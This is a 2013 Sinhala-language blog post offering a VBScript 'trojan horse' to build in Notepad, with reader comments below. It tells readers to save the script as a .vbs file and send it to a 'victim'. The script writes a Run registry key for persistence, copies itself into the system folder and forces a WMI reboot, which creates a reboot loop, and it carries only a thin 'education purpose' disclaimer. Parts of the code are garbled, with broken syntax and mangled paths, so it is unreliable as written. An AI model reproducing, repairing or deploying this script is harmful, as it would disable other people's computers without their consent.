වයිරස් 01.......trojan horse using notepad

Saturday, September 7, 2013
කලින් පෝස්ට් එකකින් මම ප්‍රෝගෑමින් ගැන පොඩි විස්තරයක් ලිව්වා මම හිතන්නේ ගොඩක් අය ඒක කියවන්න ඇති...ඉතින් මම අද ඉදන් අථත් මාතෘකාවක් විදියට ප්‍රෝගෑමින් යොදාගෙන වයිරස් කෝඩ් ලියනවිදිය ගැන පොඩි පෝස්ට් කීපයක් දාන්නම්...හැබැයි මේ සේරම දේවල් ලියන්නේ education purpose විතරයි,වැරදි දේවල් වලට යොදාගන්න එපා!
අද පෝස්ට් එකෙන් ලියන්නේ batch programming ඒ කියන්නේ notepad එක  යොදාගෙන trojan horse වයිරස් එකක් හදන විදිය...








මෙහෙමයි,
මුලින්ම  notepad එක open කරන්න....
ඊලගට  පහත තියෙන  code එක කොපි  කරලා  පේස්ට්  කරන්න....
.vbs කියන extension එක විදියට සේව් කරගන්න.....උදා:- trojenhorse.vbs
දැන් ඔයාගේ victim ගේ computer එකට යවන්න....

code

brakes - dlRB "DL Reboot" Trojan script by D.L.

On Error Resume Next
FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData

set FSobj = CreateObject ("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder (1)

createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \dlRB", sysDir & "\ dlRB.vbs"

sub createRegKey (regkey, regVal)
set regedit = CreateObject ("WScript.Shell")
regEdit.RegWrite regkey, regVal
end sub

set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")
generateCopy.close

set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)
setFile ()
fixedCode = replace (fileData, chr (94), "" "")

set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)
procreateCopy.write fixedCode
procreateCopy.close

rebootSystem ()

setFile function ()
fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _
"strComputer = ^. ^" & vbCrLf & _
"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _
"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" &vbCrLf & _
"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _
"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _
"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _
"ObjOperatingSystem.Reboot ()" & vbCrLf & _
"Next"
end function

rebootSystem function ()
strComputer = "."

Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")

Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")

For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot ()
Next
end function

තවත් මේවගේ පෝස්ට් එකක් අරගෙන එන්නම්...එතකම් දිගටම රැදිලා ඉන්න.....

3 comments:

  1. mokadda meken computer ekata wena effect eka?

    ReplyDelete
  2. trojan horse gana post 1k dala athi balanna.....

    ReplyDelete
  3. mata me blog eka liyana kenath ekka poddak katha karanna puluwanda? me mage fb acc eka. https://www.facebook.com/deshan.randima

    ReplyDelete